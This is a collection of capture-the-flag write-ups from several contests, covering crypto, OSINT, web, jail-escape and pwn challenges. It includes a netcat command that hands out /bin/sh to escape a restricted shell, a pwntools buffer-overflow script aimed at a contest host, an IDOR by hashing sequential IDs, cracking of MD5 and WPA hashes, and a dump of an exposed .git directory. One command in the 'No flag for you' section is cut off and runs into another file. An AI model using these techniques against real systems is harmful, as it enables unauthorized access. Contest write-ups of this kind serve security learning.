28 | - I checked whether hashing `11` with `SHA256` gives the same value as our reference id. We can use `openssl` or any other relevant tool.
29 | 
30 |
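31 | - The hash was the same, so I started with `0` and replaced my hash with the new one. Because the reference is just an unsalted hash of a small sequential ID, anyone can compute it; it offers no protection unless the server also checks that the requester is allowed to see that record.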
32 | 
33 |
34 | - Using just `0` gave us the hash `5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9`, which got us the flag.
35 | 
36 |
37 | ```
38 | flag{770a058a80a9bca0a87c3e2ebe1ee9b2}
39 | ```
40 |
41 |
--------------------------------------------------------------------------------
/nahamcon_2025/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2025
2 |
3 | 
4 |
5 | ## WriteUps
6 |
7 | We have added all the challenges we were able to solve, this is not a complete list.
8 |
9 | * [Cryptography](crypto.md)
10 | * [DevOps](devops.md)
11 | * [Malware](malware.md)
12 | * [Misc](misc.md)
13 | * [OSINT](osint.md)
14 | * [The Mission](TheMission.md)
15 | * [Warmups](warmups.md)
16 | * [Web](web.md)
17 |
--------------------------------------------------------------------------------
/nahamcon_2025/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2025
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can
5 | discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in
6 | your journey with amazing people from all over the world."
7 | image: images/twc_og_banner.jpg
8 | ctf: Nahamcon 2025
9 | ---
--------------------------------------------------------------------------------
/nahamcon_2025/nahamcon_2025_twc_cert-min.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhitecircle/ctf_writeups/28b263d522098954f59d1f075283320cf70d8131/nahamcon_2025/nahamcon_2025_twc_cert-min.png
--------------------------------------------------------------------------------
/sdctf_2021/README.md:
--------------------------------------------------------------------------------
1 | # SDCTF 2021
2 |
3 | 
4 |
5 | ## WriteUps
6 |
7 | We have added all the challenges we were able to solve, this is not a complete list.
8 |
9 | * [OSINT](osint.md)
10 | * [Web](web.md)
11 | * [Cryptography](crypto.md)
12 | * [Reverse Engineering](re.md)
13 | * [Pwn](pwn.md)
14 | * [Misc](misc.md)
--------------------------------------------------------------------------------
/sdctf_2021/crypto/Lostintransmission.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | Lost in transmission Writeup
4 | desc: Check out our writeup for Lost in transmission for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: crypto
9 | challenge: Lost in transmission
10 | tags: "crypto, starry"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | * We get a flag.dat file with gibberish inside.
19 | * Rotating 1 right showed the flag.
20 |
21 | 
22 |
23 |
--------------------------------------------------------------------------------
/sdctf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | SDCTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | ---
--------------------------------------------------------------------------------
/sdctf_2021/misc/Noflagforyou.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | No flag for you Writeup
4 | desc: Check out our writeup for No flag for you for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: misc
9 | challenge: No flag for you
10 | tags: "misc, taz, jail, escape"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Taz
17 |
18 | * We found out that `ls`, `cat`, `echo` commands were available.
19 | * So started looking around for these.
20 | * Found a way to list dir using echo:
21 |
22 | ```
23 | echo /*
24 | ```
25 |
26 | 
27 |
28 | * started looking around for the flag and found it in the `/home/user/run/opt` dir
29 |
30 | ```
31 | echo /home/user/run/opt/*
32 | ```
33 |
34 | * Did some research on ways to read a file using echo, and got something.
35 | * Reference link: https://stackoverflow.com/questions/22377792/how-to-use-echo-command-to-print-out-content-of-a-text-file
36 |
37 | ```
38 | echo "$( Solved By : Taz
17 |
18 | * searched: UCSD faculty CSE ( https://cse.ucsd.edu/faculty-research )
19 | * UCSD faculty mathematics ( https://www.math.ucsd.edu/people/faculty/ )
20 | * in the CSE got into Algorithm, cryptography etc as it’s most linked to math and got
21 | : https://cstheory.ucsd.edu/faculty.html
22 |
23 | * now looked for the common name in both and came across this profile:
24 | https://www.math.ucsd.edu/people/profiles/daniel-kane/
25 |
26 | * Description here confirmed our target.
27 |
28 | **FLAG**: `Daniel Kane`
29 |
30 |
--------------------------------------------------------------------------------
/sdctf_2021/osint/SpeedStudying2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | Speed-Studying 2 Writeup
4 | desc: Check out our writeup for Speed-Studying 2 for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: osint
9 | challenge: Speed-Studying 2
10 | tags: "osint, ava"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Ava
17 |
18 | * Simply googling for `skyline problem ucsd`
19 | * we get this link for PDF :
20 | https://cseweb.ucsd.edu/~dakane/CSE101%20Problem%20Archive/F18/Homework3.pdf
21 |
22 | * at the bottom we have our flag
23 |
24 | ```
25 | sdctf{N1ce_d0rKiNG_C@pt41N}
26 | ```
--------------------------------------------------------------------------------
/sdctf_2021/osint/Thisflaghasbeenstolen.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | This flag has been stolen Writeup
4 | desc: Check out our writeup for This flag has been stolen for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: osint
9 | challenge: This flag has been stolen
10 | tags: "osint, nigamelastic"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : nigamelastic
17 |
18 | * the flag is here : https://web.archive.org/web/20210130094941/https://sdc.tf/
19 |
20 |
--------------------------------------------------------------------------------
/sdctf_2021/osint/hIDeandseek.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | hIDe and seek Writeup
4 | desc: Check out our writeup for hIDe and seek for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: osint
9 | challenge: hIDe and seek
10 | tags: "osint, taz"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Taz
17 |
18 | * we are given two locations :
19 | ```
20 | First : ?v=hqXOIZtRYZU
21 | ```
22 | * it looks like part of a youtube link
23 | * link: https://www.youtube.com/watch?v=hqXOIZtRYZU
24 | * here he dictates the 1st part of the flag.
25 | ```
26 | Second : qFHIm0c.jpeg
27 | ```
28 | * it’s an image so I first looked into the most used online image sharing platform **imgur**
29 | * Link: https://i.imgur.com/qFHIm0c.jpeg
30 | * here we have the 2nd part of the flag.
31 | ```
32 | sdctf{W0w_1_h4D_n0_ID3a!}
33 | ```
34 |
35 |
--------------------------------------------------------------------------------
/sdctf_2021/web/GETSRequest.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | GETS Request Writeup
4 | desc: Check out our writeup for GETS Request for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: web
9 | challenge: GETS Request
10 | tags: "web, twh"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | * The challenge hints at memory issues
19 | * we can enter an integer and the web app sends a reply
20 | * there are few checks which the web app makes:
21 |
22 | ```javascript
23 | if(!req.query.n) {
24 | res.status(400).send('Missing required parameter n');
25 | return;
26 | }
27 | ```
28 | * so `n` cannot be blank
29 |
30 | ```javascript
31 | const BUFFER_SIZE = 8;
32 |
33 | if(req.query.n.length > BUFFER_SIZE) {
34 | res.status(400).send('Requested n too large!');
35 | return;
36 | }
37 | ```
38 |
39 | * so max length of `n` can be `8`
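40 | * the web app does not check for duplicate parameters, so we can send another `n` along with the first; with a repeated parameter, `req.query.n` is parsed as an array (the usual Express behaviour), so `.length` counts the elements rather than the characters and the size check no longer bounds the input. Rejecting any `n` that is not a string (`typeof req.query.n !== 'string'`) closes this gap.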
41 |
42 | 
43 |
44 |
--------------------------------------------------------------------------------
/sdctf_2021/web/GitGood.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | Git Good Writeup
4 | desc: Check out our writeup for Git Good for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: web
9 | challenge: Git Good
10 | tags: "web, twh, git"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | * `robots.txt` reveals an `admin` page and a `.git` directory
19 |
20 | 
21 |
22 | * I used a very useful tool which helps to dump file contents of websites which use GIT version control system
23 | * https://github.com/internetwache/GitTools
24 |
25 | * `.git` directory dumped :
26 |
27 | 
28 |
29 | * now we can use extractor to get files from the dump
30 |
31 | 
32 |
33 | * I found 2 `users.db` files, both are sqlite3 databases
34 | * one contains `bcrypt` hashes and other one contains `md5` hashes
35 | * I cracked the md5 hashes first because they take less time (MD5 is a fast hash, while bcrypt is deliberately slow to compute)
36 |
37 | 
38 |
39 | * one valid credential found :
40 |
41 | ```
42 | aaron@cgau.sdc.tf : weakpassword
43 | ```
44 |
45 | * login on `admin.html` and we get the flag
46 |
47 | 
--------------------------------------------------------------------------------
/sdctf_2022/README.md:
--------------------------------------------------------------------------------
1 | # SDCTF 2022
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Jail](jail.md)
10 | * [Misc](misc.md)
11 | * [OSINT](osint.md)
12 | * [Pwn](pwn.md)
13 | * [Web](web.md)
--------------------------------------------------------------------------------
/sdctf_2022/crypto.md:
--------------------------------------------------------------------------------
1 | # crypto
2 |
3 | ## Vinegar
4 | > Solved by - Avantika(iamavu)
5 |
6 | ```
7 | Vinegar
8 | My friend gave me another encrypted flag...I think they hate me! I heard them yell something about “Vinegar”, but I still don’t know what they’re talking about!
9 |
10 | Ciphertext
11 | {wbeyrjgewcfroggpesremvxgvefyrcmnnymxhdacgnnrwprhxpuyyaupbmskjrxfopr}
12 |
13 | Note
14 | My friend also yelled something about “preventing plaintext attacks” and said once I’ve decrypted this, I’ll need to append sdctf to the front of it.
15 | ```
16 |
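17 | As the name implies, this is a Vigenère cipher, so we just need to bruteforce it. The `sdctf` prefix was left out of the ciphertext so that it cannot serve as known plaintext for recovering the key.
18 | I googled for Vigenere bruteforce and the first [tool](https://www.guballa.de/vigenere-solver) did the trick.
19 | Don’t forget to prepend `sdctf` to the decrypted text.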
20 |
21 | FLAG :
22 |
23 | ```
24 | sdctf{couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate}
25 | ```
26 |
27 |
28 |
--------------------------------------------------------------------------------
/sdctf_2022/crypto/Vinegar.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Vinegar Writeup
4 | desc: Check out our writeup for Vinegar for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: crypto
9 | challenge: Vinegar
10 | tags: "crypto, ava, cipher"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by - Avantika(iamavu)
17 |
18 | ```
19 | Vinegar
20 | My friend gave me another encrypted flag...I think they hate me! I heard them yell something about “Vinegar”, but I still don’t know what they’re talking about!
21 |
22 | Ciphertext
23 | {wbeyrjgewcfroggpesremvxgvefyrcmnnymxhdacgnnrwprhxpuyyaupbmskjrxfopr}
24 |
25 | Note
26 | My friend also yelled something about “preventing plaintext attacks” and said once I’ve decrypted this, I’ll need to append sdctf to the front of it.
27 | ```
28 |
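29 | As the name implies, this is a Vigenère cipher, so we just need to bruteforce it. The `sdctf` prefix was left out of the ciphertext so that it cannot serve as known plaintext for recovering the key.
30 | I googled for Vigenere bruteforce and the first [tool](https://www.guballa.de/vigenere-solver) did the trick.
31 | Don’t forget to prepend `sdctf` to the decrypted text.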
32 |
33 | FLAG :
34 |
35 | ```
36 | sdctf{couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate}
37 | ```
38 |
39 |
40 |
--------------------------------------------------------------------------------
/sdctf_2022/forensics/Susanalbumparty.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Susan album party Writeup
4 | desc: Check out our writeup for Susan album party for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: forensics
9 | challenge: Susan album party
10 | tags: "forensics, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Starry-lord
18 |
19 | 
20 |
21 | We get the file stub and notice it's a JPEG image. Since the file was pretty heavy while the image looks very low-res, it was almost certain that something was hidden inside. When opened in an image editor such as GIMP, we see the first part of the flag:
22 |
23 | 
24 |
25 | This hinted at the magic bytes of JPEG files, `FFD8` (the start-of-image marker; `FFD9` marks the end of an image). At this point I turned the file to hex and looked for `ffd8`:
26 |
27 | 
28 |
29 | and found three files like that:
30 |
31 | 
32 |
33 | 
34 |
35 | 
36 |
37 | ```
38 | sdctf{FFD8_th3n_SOME_s7uff_FFD9} 'some' with a zero
39 | ```
40 |
--------------------------------------------------------------------------------
/sdctf_2022/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | SDCTF 2022
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | ---
--------------------------------------------------------------------------------
/sdctf_2022/jail.md:
--------------------------------------------------------------------------------
1 | # jail
2 |
3 | ## rbash warmup
4 | > Solved By : thewhiteh4t
5 |
6 | we can use `compgen` to check for available commands
7 |
8 | ```
9 | compgen -c
10 | ```
11 |
12 | 
13 |
14 |
15 | another way is to use `echo`
16 |
17 |
18 | 
19 |
20 |
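21 | now the known way of escaping with `nc` is by getting a shell on our “attacker” box, but in this challenge we are not allowed to connect to remote machines, so we are left with localhost
22 |
23 | actually this is even easier: we start a listener on localhost that hands out `/bin/sh`, and the shell it spawns is a regular shell rather than rbash, so the restrictions no longer apply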
24 |
25 | ```
26 | nc -lvp 4444 -e /bin/sh &
27 | ```
28 |
29 | 
30 |
31 |
32 | now we can connect to it !
33 |
34 |
35 | 
36 |
37 | ----------
38 |
39 |
40 | ## rbash yet another calculator
41 | > Solved By : thewhiteh4t
42 |
43 | challenge mentions that filename has been changed this time but it is in the same working directory
44 |
45 | so we can again use echo to check the file name
46 |
47 | 
48 |
49 |
50 | just google “echo read file”
51 |
52 |
53 | 
54 |
--------------------------------------------------------------------------------
/sdctf_2022/jail/rbashwarmup.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | rbash warmup Writeup
4 | desc: Check out our writeup for rbash warmup for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: jail
9 | challenge: rbash warmup
10 | tags: "jail, twh, rbash, escape"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | we can use `compgen` to check for available commands
19 |
20 | ```
21 | compgen -c
22 | ```
23 |
24 | 
25 |
26 |
27 | another way is to use `echo`
28 |
29 |
30 | 
31 |
32 |
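33 | now the known way of escaping with `nc` is by getting a shell on our “attacker” box, but in this challenge we are not allowed to connect to remote machines, so we are left with localhost
34 |
35 | actually this is even easier: we start a listener on localhost that hands out `/bin/sh`, and the shell it spawns is a regular shell rather than rbash, so the restrictions no longer apply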
36 |
37 | ```
38 | nc -lvp 4444 -e /bin/sh &
39 | ```
40 |
41 | 
42 |
43 |
44 | now we can connect to it !
45 |
46 |
47 | 
48 |
49 |
--------------------------------------------------------------------------------
/sdctf_2022/jail/rbashyetanothercalculator.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | rbash yet another calculator Writeup
4 | desc: Check out our writeup for rbash yet another calculator for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: jail
9 | challenge: rbash yet another calculator
10 | tags: "jail, twh, rbash, escape"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 | challenge mentions that filename has been changed this time but it is in the same working directory
21 |
22 | so we can again use echo to check the file name
23 |
24 | 
25 |
26 |
27 | just google “echo read file”
28 |
29 |
30 | 
31 |
--------------------------------------------------------------------------------
/sdctf_2022/misc.md:
--------------------------------------------------------------------------------
1 | # misc
2 |
3 | ## Ishihara test++
4 | > Solved by: Taz34
5 |
6 | Convert the image to PNG format, run it through stegsolve and change color planes multiple times till it gets readable.
7 |
8 | 
9 |
10 | And here is the ```flag: sdctf{c0untle55_col0rfu1_c0lors_cov3ring_3veryth1ng}```
11 |
12 | ----------
13 |
14 | ## Bishop Duel
15 | > Solved by: Taz34
16 |
17 | We have a chess board and we are playing as a white bishop and opponent as a black bishop.
18 | So for us to lose or win this game we need to be running our bishop on the same color, i.e. as in the image below we can see the opponent ‘BB’ can move on ‘__’ spaces and we ‘WW’ can move on ‘\\\\’ spaces, so we need our bishop to move on ‘__’ spaces.
19 |
20 | 
21 |
22 | So for that we need to get out of the board, and there are two ways out of the board, i.e. the top right corner or the bottom left corner.
23 | So, I decided to move out of the top right.
24 | I used C1 then E2 and then we landed on a ‘__’ space.
25 |
26 | 
27 |
28 | Now just get in the way of the opponent to lose to get the flag.
29 |
30 | 
31 |
32 | ```
33 | Flag: sdctf{L0SiNG_y0uR_S0uRC3_C0d3_sUcKs}
34 | ```
--------------------------------------------------------------------------------
/sdctf_2022/misc/BishopDuel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Bishop Duel Writeup
4 | desc: Check out our writeup for Bishop Duel for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: misc
9 | challenge: Bishop Duel
10 | tags: "misc, taz"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Taz34
18 |
19 | We have a chess board and we are playing as a white bishop and opponent as a black bishop.
20 | So for us to lose or win this game we need to be running our bishop on the same color, i.e. as in the image below we can see the opponent ‘BB’ can move on ‘__’ spaces and we ‘WW’ can move on ‘\\\\’ spaces, so we need our bishop to move on ‘__’ spaces.
21 |
22 | 
23 |
24 | So for that we need to get out of the board, and there are two ways out of the board, i.e. the top right corner or the bottom left corner.
25 | So, I decided to move out of the top right.
26 | I used C1 then E2 and then we landed on a ‘__’ space.
27 |
28 | 
29 |
30 | Now just get in the way of the opponent to lose to get the flag.
31 |
32 | 
33 |
34 | ```
35 | Flag: sdctf{L0SiNG_y0uR_S0uRC3_C0d3_sUcKs}
36 | ```
--------------------------------------------------------------------------------
/sdctf_2022/misc/Ishiharatest.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Ishihara test++ Writeup
4 | desc: Check out our writeup for Ishihara test++ for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: misc
9 | challenge: Ishihara test++
10 | tags: "misc, taz, stegano"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | Convert the image to PNG format, run it through stegsolve and change color planes multiple times till it gets readable.
19 |
20 | 
21 |
22 | And here is the ```flag: sdctf{c0untle55_col0rfu1_c0lors_cov3ring_3veryth1ng}```
23 |
24 |
--------------------------------------------------------------------------------
/sdctf_2022/osint/GoogleRansom.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Google-Ransom Writeup
4 | desc: Check out our writeup for Google-Ransom for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: osint
9 | challenge: Google-Ransom
10 | tags: "osint, ava, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Avantika (iamavu) and Starry-Lord
18 |
19 | ```
20 | Google Ransom
21 | Oh no! A hacker has stolen a flag from us and is holding it ransom. Can you help us figure out who created this document? Find their email address and demand they return the flag!
22 |
23 | Ransom Letter - https://docs.google.com/document/d/1MbY-aT4WY6jcfTugUEpLTjPQyIL9pnZgX_jP8d8G2Uo/edit
24 | ```
25 |
26 | We can find the owner of any drive file via google API, simply query the fileID which is present in the URL itself
27 | https://developers.google.com/drive/api/v3/reference/files/get
28 |
29 | 
30 |
31 | the `*` (the value given for `fields`) asks for all available metadata fields; we get the email as `amy.sdctf@gmail.com`, send them an email, and we get back our flag
32 |
33 | FLAG - `sdctf{0p3n_S0uRCE_1S_aMaz1NG}`
34 |
35 |
--------------------------------------------------------------------------------
/sdctf_2022/osint/Partoftheship.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Part of the ship Writeup
4 | desc: Check out our writeup for Part of the ship for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: osint
9 | challenge: Part of the ship
10 | tags: "osint, ava, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Avantika(iamavu) and Starry-Lord
18 |
19 | ```
20 | Part of the ship...
21 | Sometimes I worry about my friend... he's way too into memes, he's always smiling, and he's always spouting nonsense about some "forbidden app." I don't know what he's talking about, but maybe you can help me figure it out! All I know is a username he used way back in the day. Good luck! Flag format is sdctf{flag}
22 |
23 | Username
24 | DanFlashes
25 | ```
26 |
27 | “smiling” and “app”, reminded me of iFunny , I went to https://ifunny.co/user/DanFlashes
28 | but it gave a 404, so first thing usually which I do is check on wayback machine and boom, we got our flag
29 | https://web.archive.org/web/20220128003432/https://ifunny.co/user/DanFlashes
30 |
31 | FLAG - `sdctf{morning_noon_and_night_I_meme}`
32 |
33 | Additional details:
34 |
35 | https://ifunny.co/picture/top-definition-part-of-the-ship-part-of-the-crew-LKPb8Zjx7
36 |
37 |
--------------------------------------------------------------------------------
/sdctf_2022/osint/Samuel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2022 | Samuel Writeup
4 | desc: Check out our writeup for Samuel for Sdctf 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2022
7 | parent: sdctf_2022
8 | category: osint
9 | challenge: Samuel
10 | tags: "osint, ava, starry"
11 | date: 2022-05-10T00:00:00+00:00
12 | last_modified_at: 2022-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : Avantika(iamavu) and Starry-Lord
18 |
19 | 
20 |
21 | We have a youtube video https://www.youtube.com/watch?v=fDGVF1fK1cA. We can see a blurry video, with a beacon going on and off in the night, with what seems like cable-cars or planes in the distance. Short light and long lights seemed like morse code. Here's the decoded morse.
22 |
23 | ```
24 | WHWHWHGODWROUGHT
25 | ```
26 |
27 | https://www.history.com/.amp/this-day-in-history/what-hath-god-wrought
28 |
29 | According to the link, Samuel Morse demonstrated the telegraph in 1844 with the sentence "what hath God wrought".
30 |
31 | So we are looking for a beacon that sends the message in morse code, and I found this https://sculpturemagazine.art/mixed-messages-mark-bradfords-what-hath-god-wrought/
32 |
33 | Avantika then found the location for this place on Google maps.
34 | https://www.google.com/maps/place/What+Hath+God+Wrought/@32.8752134,-117.2429636,17z/data=!3m1!4b1!4m5!3m4!1s0x80dc07e0d30e81a7:0x69087278617d6b1d!8m2!3d32.8752134!4d-117.2407749
35 |
36 | ```
37 | sdctf{32.875,-117.240}
38 | ```
39 |
40 |
--------------------------------------------------------------------------------
/sdctf_2022/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## Horoscope
4 | > Solved by: Taz34
5 |
6 | Here we have a binary so the first thing i started to look for is to get a segmentation fault and we got it.
7 |
8 |
9 | 
10 |
11 |
12 | Now I started looking for the offset: the padding that has to follow the date prefix is 42 characters long,
13 | i.e.
14 |
15 |
16 | python3 -c "print('10/10/1999/10:' + '1'*42)"
17 | Hence the payload is: 10/10/1999/10:111111111111111111111111111111111111111111
18 |
19 | Now we started looking at Ghidra, and we found a function “test” from which we can get a shell on target.
20 |
21 | 
22 |
23 |
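24 | here we have a problem: we need to make the `(temp == 1)` condition true.
25 | So, after going through the other functions we found another function “debug”, which we call first so that the condition holds when `test` runs (presumably it sets `temp` to 1).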
26 |
27 | 
28 |
29 |
30 | Now we can construct the final payload as:
31 |
32 | payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + debug_fun_addr + test_fun_addr
33 |
34 | hence the final script:
35 |
36 | from pwn import *
37 |
38 | p = remote("horoscope.sdc.tf", 1337)
39 |
40 | payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + p64(0x40096e) +p64(0x400950)
41 |
42 | p.sendline(payload)
43 |
44 | p.interactive()
45 |
46 | now just execute this script to get the flag
47 |
48 | 
49 |
50 | Flag: sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}
51 |
52 |
--------------------------------------------------------------------------------
/uiuctf_2021/README.md:
--------------------------------------------------------------------------------
1 | # UIUCTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Crypto](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Misc](misc.md)
10 | * [OSINT](osint.md)
11 | * [Pwn](pwn.md)
--------------------------------------------------------------------------------
/uiuctf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | UIUCTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | ---
--------------------------------------------------------------------------------
/uiuctf_2021/misc.md:
--------------------------------------------------------------------------------
1 | # misc
2 |
3 | ## CEO
4 | > Solved by : thewhiteh4t
5 |
6 | - We have a `.cap` file in this challenge
7 | - its a handshake file which can be used with `aircrack-ng`
8 |
9 |
10 | aircrack-ng megacorp-01.cap -w /usr/share/wordlists/rockyou.txt
11 |
12 |
13 | 
14 |
15 |
16 |
17 | uiuctf{nanotechnology}
18 |
19 |
20 | ----------
21 |
22 | ## doot doot
23 | > Solved by : thewhiteh4t
24 |
25 |
26 | - we are given a youtube video which is 8hrs 52mins long
27 | - bee movie script is looping
28 | - flag appears in the scrolling text at 9:55
29 | - https://youtu.be/zNXl9fqGX40?t=595
30 |
31 |
32 | 
33 |
34 |
35 | `uiuctf{doot_d0ot_do0t_arent_you_tired_of_the_int4rnet?}`
36 |
37 | ----------
38 |
39 | ## Emote
40 | > Solved by : Starry-Lord
41 |
42 | Challenge mentions sharing images on discord, so I checked uiuctf 's discord and found a suspicious emoji:
43 |
44 |
45 | 
46 |
47 |
48 | Use zsteg on the png to read flag:
49 |
50 |
51 | uiuctf{staring_at_pixels_is_fun}
52 |
53 |
--------------------------------------------------------------------------------
/uiuctf_2021/misc/CEO.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
